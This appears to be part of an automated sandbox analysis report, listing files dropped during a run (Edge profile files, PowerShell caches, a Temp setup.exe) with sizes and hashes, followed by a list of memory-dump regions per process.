C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d70199bafa655c8d8eeabf85b23413cb

SHA1
8cf804bbed0653b14d728556ad5eb51103368fc0

SHA256
94c30f924254d68b17164ac1f2ded2b56d11c83dd82f551c7c87d1715e15b73c

SHA512
25184dfb46074d0773e8faaa0a4bacda812cc3c3b84d94bf3d6e3a253dfd15a48c97090281494afffd31d244406748f34f8d5f40813e6df068930624c87b1e42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9f8c471ded4e34f3b7d8af279150b129

SHA1
7a348531d94acf3d043c6c3b6209d1377b1b7ae5

SHA256
76cd5c3de3fc489813b8ce6531ee05b2b2cb6f7ad17012f249ef37f50ec05a3d

SHA512
2d37199112d9e23f645fd1976605a01cc196629db818c31f5fe1e1ebe41b5ceda5a1c85d08875eaa1ad9dca9ff990b03803c179851eadc42f05b9457a8dfca75

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e9fa49314c57552450c9e94b4df698e7

SHA1
0857562321623c28d93cde7e469e7c4186e1eb66

SHA256
f5926e3c6015ed1f00fc7598b61dd5940e67d4f3044af9f70bab3f75369a6700

SHA512
e840ed65111acaec92a413e356820dcd05d62d9682a2f00a4e7c684272c32924d46e618dfff00c2bba3bbbc2529ed3be26c41e585945864966dbfeacf4daae38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
be8c1715cbbf0b1367c87da26f3b94e8

SHA1
6d14eb65f5af5a58a79336e340ea927c10ba6298

SHA256
c9abdb4ab9f1f5827ecae07c3ec81d7141262f14d46dca406d90d26b2d99b86f

SHA512
92dd023f113862e10185020962666fca78aa24282d5126e03989aa535cb2c05c0b29de93bcdff7785815482fef02257659686e673c66e8efa00d6002ef171574

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
7109ac3f345d83023903a52177793565

SHA1
6e456d1dd31af88773e469b1fa4e710bb943f856

SHA256
947983ef3bd96f55abee09f969628c53fe12a567212f9c06784a5ecac1daf2e0

SHA512
db7107f432ac7b8444fe9f2bd9dd9c2dce8b54a4ddb1b43ed0457bfc6e230427c7cc69a2bfa194b99c705fa1661743566e7a26a3579374646daaa19ae20b00f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
50662c26ca45b4a41d805ffc2756327e

SHA1
e7ce81f8a64839f44ffb7a2febd9915101e83ea5

SHA256
5cc9cbfa35ba0e70882536b9a383699674294035613b183ac28323b2767ef66e

SHA512
b873f0c440bdbc0c0e144fc22cc41441a34d3a39128b16098e7054cfc16b480b20c176fb6a1b85be55a4c1f7a08e24ae6683bb60e52ab9516c532e90a9fc263a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
717c89ab2252264c066c6cefb30eb01c

SHA1
6db2e79b62221c5bde2966e54890028f5f6e9719

SHA256
b03b386b6bd6ffb72dfcf5d33c9980aeaa76b99dfb69a78f003412bf8df0d25f

SHA512
fdfbdb6369b83c505e332aa6160a5c6dac089782911f092eea7bb2c8be257fc931c15a7116672d9a41d986e61f775232db5382c91d61ff71ad1d078ae44f9414

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
7175fd0a28cbca1682586b2ff472a939

SHA1
48241d72d4b097a825948d82ca39d7882cfca01b

SHA256
64b1106e2b6cee2663b4c906fde00e4d3f96e89107b6a68cd25a71808cc7ace8

SHA512
c23684b6ad9030ed498527049e3e29d0160a81b969d90c6f27b70776ef96a947b9dbf789e9d59dad4c033e375f39dab1cf939c063af314ad1fade0af18fb9599

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
2KB

MD5
84f39635f69b32cb5bdef60abcd5e7db

SHA1
5c78c62b0286e75cec5a453dcb5d7c918f18355f

SHA256
cad64f211929a4b63f12545e5616e93379e545868cd3de7ba9ab9e074b585c04

SHA512
4e82113a1c8573147c2873f3c12246b671c6097e2309b067b8beafc7b5009695eff49b9770d0455135610b9ec8af9d633e5225f433f8283f6ccf9df435cde7fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
df349bf73a7b7966aa3a92e9426e11ed

SHA1
2ab96241964e2b8c51dd2814465345d58e091d8a

SHA256
279888e002a34a3a01dc211e3d9c54a2afa081bc48d55ab870346d4d1c8b7216

SHA512
fc0046e973f686570f7034a5103bcb9f33d1b51c4eef5f573dbfd6c8d4bdff25996b6f6b9af221cb59779f943ad1716e8d73435a10c9231750c0465d615d2a84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
c11b7bbb54ac99564c09ea9a231d4f91

SHA1
15b0dd1adcc3c60d43a6a3c149e99a3ef9339596

SHA256
4608ccb1d27807eda605792e4c70bd7edf384f77ff0c1a8e0dca987f2a970a7a

SHA512
beda578bcf4d77f3738643ba1c5c8fbc085c911d11e5df1743ec84e609c5e1d546243531cbb12e1c226d0d25516c2e603944230ffa9ae419d29daf172b527394

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58e29b.TMP

Filesize
370B

MD5
f8542243707b825189b0d7f4f3023331

SHA1
95c2e8d99ce030e9194bc39dc6e3a3b4b4fae7e0

SHA256
ed54c304e33b0bec93e385589c08bb28c257ee422aa98c64574c39a23620798a

SHA512
1051171bd7ad501c8e67bcdad2e229a33ca9467b3c02fe1beb38e3497354f0c8cb0e1efa1cf6133859c8502d622da9e06f2ec4beb08fefcb9312bc597cd0f47a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c99e24e492edb06f04acffb0c815f352

SHA1
53f4051d4f3d3618b20bff29ae4f77c7f9ccce84

SHA256
1367b5fcb3606eb8af16119e2d2f1910065c152ebd3bd7ca4a702d6746e3e542

SHA512
88fb5c489381e0158217e0c93e344184eebfb33cac42b2a68296a8b62b584131c1533dfc1b2f90a6e30be9786f85c6662d785e0431e1406b8f215942b65ef40d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
12KB

MD5
7b454936e77a8cd1285642851cfef7cd

SHA1
8ccbe83becff25fdbc3c64540881cf620acbdd7c

SHA256
e8a45c1a4f7083ae6f9ce47f5034ce894e349db539f46f431584f1c931bf6a4a

SHA512
34d77ffe90ebd69fa872bfd979724ce0de9c2f13eb1562eda8022e15fd2e3716236ed36e9040c0b4c8e46db99518aa5cf64f064494451af867b796c0b2b10fcd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
8KB

MD5
caa08787b4572182beac78a441f8a81d

SHA1
fcfee066ddd79fa511ba4b7d5bc6869e29257ca2

SHA256
168e07413c8a6b01b4a9a72802feef3bd69bef7b254c149be633251629e58b15

SHA512
cf5e5059d70c4a52890467eabfc9d324bee4df2145fb15e8e769ee54f1128862f9aaee20d8ffbe7185855af9e4188121a3bc3da7fface1aec6390fc2e9af7373

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8cad09c43ecf59a26ecccee0252d0d54

SHA1
520f61e2b0b07844a9af4c10e809dadf1d5800af

SHA256
d872502a43efe2b879dd82ad8b669955ac1dc60e34e20ba7e1877d9ae8fa6995

SHA512
c141dc7f43c5932811ae537eb2269b95b57e612f56fcb984d0253abff341807e83b4c1845f6f7490347eff26c56c7ede2bc57902adb3410d7cd41197f0e4ec55

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
8e6f20ca050af99e689db9bfcfd24935

SHA1
771b76f1e758aabdf61d574fff2a9fd97dc13387

SHA256
81e3bbd88b99fd98b234b737bc12b1cc03cbf49e677b528a3bc955ac6087d1cd

SHA512
b0a4b74b0c0864a9fe65aebcaa148d19da1775fc96e63b5557d9e03310a25f2901fd9ecd77bb681bb3b5a83b20e727387ed2b36325905b538d3b1ca73f16187b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
f2922996ff8a4614115667849b74c1e2

SHA1
bdb7888c3d0655d18da6876837616da473a18986

SHA256
6ae7cfa98bfa4d16dc5a2c3a833471eea20b611c126eac7e9895c1b42fe0e32d

SHA512
52d3621438798ff98a48ee8f059d677ea2e006460fe3b359f89bbf7d13d01271b5e7465acaf4547f63b6f3fb30baf49db3f425f368a3f03c696a55eebec03a65

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
56KB

MD5
bee9978962fa86af6e8d16ad4ed87e9a

SHA1
d7c5c74b53dc30d370516d4ce2c277863c81bf06

SHA256
aca9878a0061308d12858589c1a06e8f430f390a2093907153ae205d4eb363fb

SHA512
c5c096a6e977da07e046047ba8f81fa61668b75cafe8ef15d97f0da3f2151ed2a87634770c231c270b333fc4ad15414a4f3446ce1f12d461aea939539ae0ec2f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
0d0690e37866ffebd0f2066d0168da6b

SHA1
b9dc29bcab9f7ebdd54834c70c4a9246c7caa3a8

SHA256
b550ac97ab80592e57d4fa8c3fc1de157cf78b03c281530abbf927c864c56903

SHA512
817f9e183b65032dfd6dc3d81323387ea91f116193fa32d649f19b15225e4f640fa479ec829d7ca553603239ee95426568bbb2823c6980360168fad4b9cb6a97

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
41c6e60b4bb4d97ec6051a1723d0cc44

SHA1
73ee3a864ac8755651669300d49c4831a030d747

SHA256
e9de7d55f8e06c4d013e5db8c48a90864dd150322139e737fbf6da569edf8a3e

SHA512
319f3f02b4b0bd36d5f9dd5279bc622df467f045e6c5bd6d26efec9a8a354cb2ade3e915a3d40a562363d1ff3610a8a16320b0824d28663751865670889d1386

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
6801207e3877c14d10c73d74c12c3c5b

SHA1
d6ed690fa3e89d7a9a48c84d6f40469f39da8ef9

SHA256
c6dd173bb0b62e6c828f420957fe7a6e2f45a5e989baa2ee5d1866fdc4022efc

SHA512
15d8ede807a890fd7566bf4201ca2017037fa8a146d6f75ace1491e8d777bf2fad9becc1b2e7716ef626e6ade9f775b3716b3607e947f63212cc7270ac5af1ae

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2iluy22o.gbf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
5.1MB

MD5
c6577acba7d7cfe6086b5371e3a3aaf5

SHA1
724d3ce100780b6af8072c7e0929a6f4d701d6e5

SHA256
694045b8488e87084658e756c35088cd21dec937b8a504e9bc7e23d739499446

SHA512
eaac05cadb7f5bea353c6fec97407e6ff2e84cd430aa89bfad28af881aee3f6d45761f9d92acb31bf693ce1dd7318689084e0430df0eb2f65636b858df387dc9

Download Submit
memory/676-1877-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/680-1981-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/1008-293-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/1980-153-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/2216-133-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/2352-238-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/2920-2741-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/2972-2702-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3108-2408-0x0000023BD88B0000-0x0000023BD8965000-memory.dmp

Filesize
724KB

Download
memory/3228-2752-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3428-2722-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3492-353-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3568-253-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3856-36-0x00000000061A0000-0x00000000061BE000-memory.dmp

Filesize
120KB

Download
memory/3856-101-0x0000000007B20000-0x000000000819A000-memory.dmp

Filesize
6.5MB

Download
memory/3856-13-0x00000000052E0000-0x0000000005302000-memory.dmp

Filesize
136KB

Download
memory/3856-104-0x0000000007550000-0x000000000755A000-memory.dmp

Filesize
40KB

Download
memory/3856-15-0x0000000005B40000-0x0000000005BA6000-memory.dmp

Filesize
408KB

Download
memory/3856-35-0x0000000005CB0000-0x0000000006004000-memory.dmp

Filesize
3.3MB

Download
memory/3856-37-0x00000000063A0000-0x00000000063EC000-memory.dmp

Filesize
304KB

Download
memory/3856-89-0x00000000067C0000-0x00000000067DE000-memory.dmp

Filesize
120KB

Download
memory/3856-79-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/3856-108-0x0000000007790000-0x0000000007826000-memory.dmp

Filesize
600KB

Download
memory/3856-90-0x00000000071B0000-0x0000000007253000-memory.dmp

Filesize
652KB

Download
memory/3856-209-0x0000000007780000-0x0000000007788000-memory.dmp

Filesize
32KB

Download
memory/3856-207-0x0000000007830000-0x000000000784A000-memory.dmp

Filesize
104KB

Download
memory/3856-78-0x0000000006780000-0x00000000067B2000-memory.dmp

Filesize
200KB

Download
memory/3856-194-0x0000000007740000-0x000000000774E000-memory.dmp

Filesize
56KB

Download
memory/3856-103-0x00000000074E0000-0x00000000074FA000-memory.dmp

Filesize
104KB

Download
memory/4556-1815-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4640-387-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4748-143-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4832-273-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4880-181-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4884-119-0x0000000007C20000-0x0000000007C31000-memory.dmp

Filesize
68KB

Download
memory/4884-210-0x000000007395E000-0x000000007395F000-memory.dmp

Filesize
4KB

Download
memory/4884-5-0x000000007395E000-0x000000007395F000-memory.dmp

Filesize
4KB

Download
memory/4884-221-0x0000000073950000-0x0000000074100000-memory.dmp

Filesize
7.7MB

Download
memory/4884-9-0x0000000005140000-0x0000000005176000-memory.dmp

Filesize
216KB

Download
memory/4884-197-0x0000000007C70000-0x0000000007C84000-memory.dmp

Filesize
80KB

Download
memory/4884-10-0x00000000057B0000-0x0000000005DD8000-memory.dmp

Filesize
6.2MB

Download
memory/4884-11-0x0000000073950000-0x0000000074100000-memory.dmp

Filesize
7.7MB

Download
memory/4884-14-0x0000000006000000-0x0000000006066000-memory.dmp

Filesize
408KB

Download
memory/4884-91-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/4884-604-0x0000000073950000-0x0000000074100000-memory.dmp

Filesize
7.7MB

Download
memory/4956-313-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/5208-2649-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/5208-2701-0x0000000007230000-0x0000000007241000-memory.dmp

Filesize
68KB

Download
memory/5256-1945-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/5376-2023-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/5716-2055-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/5916-459-0x00000252FB1C0000-0x00000252FB1DC000-memory.dmp

Filesize
112KB

Download
memory/5916-495-0x00000252FB1F0000-0x00000252FB1FA000-memory.dmp

Filesize
40KB

Download
memory/5916-494-0x00000252FB1E0000-0x00000252FB1E6000-memory.dmp

Filesize
24KB

Download
memory/5916-457-0x00000252FB190000-0x00000252FB19A000-memory.dmp

Filesize
40KB

Download
memory/5916-493-0x00000252FB1B0000-0x00000252FB1B8000-memory.dmp

Filesize
32KB

Download
memory/5916-479-0x00000252FB1A0000-0x00000252FB1AA000-memory.dmp

Filesize
40KB

Download
memory/5916-369-0x00000252E2850000-0x00000252E2872000-memory.dmp

Filesize
136KB

Download
memory/5916-437-0x00000252FB170000-0x00000252FB18C000-memory.dmp

Filesize
112KB

Download
memory/5916-438-0x00000252FB210000-0x00000252FB2C5000-memory.dmp

Filesize
724KB

Download
memory/5916-492-0x00000252FB410000-0x00000252FB42A000-memory.dmp

Filesize
104KB

Download
memory/6004-2001-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/6192-1897-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/6636-1857-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/6872-1836-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/7272-1896-0x0000000007030000-0x0000000007044000-memory.dmp

Filesize
80KB

Download
memory/7272-1846-0x0000000006FF0000-0x0000000007001000-memory.dmp

Filesize
68KB

Download
memory/7272-1795-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/7404-2034-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/7576-2079-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download
memory/7916-2681-0x00000000744A0000-0x00000000744EC000-memory.dmp

Filesize
304KB

Download